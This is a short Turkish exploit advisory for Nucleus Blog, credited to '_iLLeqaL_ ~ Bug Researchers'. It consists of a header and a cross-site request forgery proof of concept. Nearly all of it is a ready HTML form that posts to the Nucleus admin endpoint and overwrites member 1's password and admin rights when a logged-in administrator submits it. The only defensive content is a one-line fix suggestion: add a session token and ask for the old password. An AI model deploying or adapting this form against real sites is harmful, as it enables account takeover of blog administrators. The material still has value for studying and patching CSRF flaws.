< ------------------- header data start ------------------- >

#############################################################

# Application Name : Nucleus Blog

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirebilir .. !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,Eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form method=post action=http://demo.opensourcecms.com/nucleus/nucleus/index.php name=memberedit>
<input name=name tabindex=10 maxlength=16 size=16 value=admin />(Kullanici Adi)<br>
<input name=realname tabindex=20 maxlength=60 size=40 value=admin />(Gercek Ad [admin olarak kalsin ..])<br>
<input type=password tabindex=30 maxlength=40 size=16 name=password />(Sifre)<br>
<input type=password tabindex=35 maxlength=40 size=16 name=repeatpassword />(Tekrar Sifre)<br>
<input name=email tabindex=40 size=40 maxlength=60 value= />(Mail)<br>
<input onclick=selectCanLogin(true); type=radio name=admin value=1 tabindex=’60’ checked=’checked’ id=admin1 /><label for=admin1>Yes</label> <input onclick=selectCanLogin(false); type=radio name=admin value=0 id=admin0 /><label for=admin0>No</label>(Admin yetkisi var ?)<br>
<input type=radio name=canlogin value=1 tabindex=’70’ checked=’checked’ id=canlogin1 /><label for=canlogin1>Yes</label> <input type=radio name=canlogin value=0 disabled=disabled id=canlogin0 /><label for=canlogin0>No</label>(Admin paneline girebilir mi ?)<br>
<select name=deflang tabindex=85>
<option value=>- use site settings -</option>
<option value=’english’>english</option>
</select><br>
<input type=radio name=autosave value=1 tabindex=’87’ checked=’checked’ id=autosave1 /><label for=autosave1>Yes</label> <input type=radio name=autosave value=0 id=autosave0 /><label for=autosave0>No</label>(Oto. Kayit Fonksiyonunu Kullansin mi ?)<br>
<input type=hidden name=action value=changemembersettings />
<input type=hidden name=memberid value=1 />
<input type=hidden name=ticket value=ef9cd8493f3cbcfc41e5324fe234d9d0 />
<input type=submit value=Kayitla />
</form>

< -- bug code end of -- >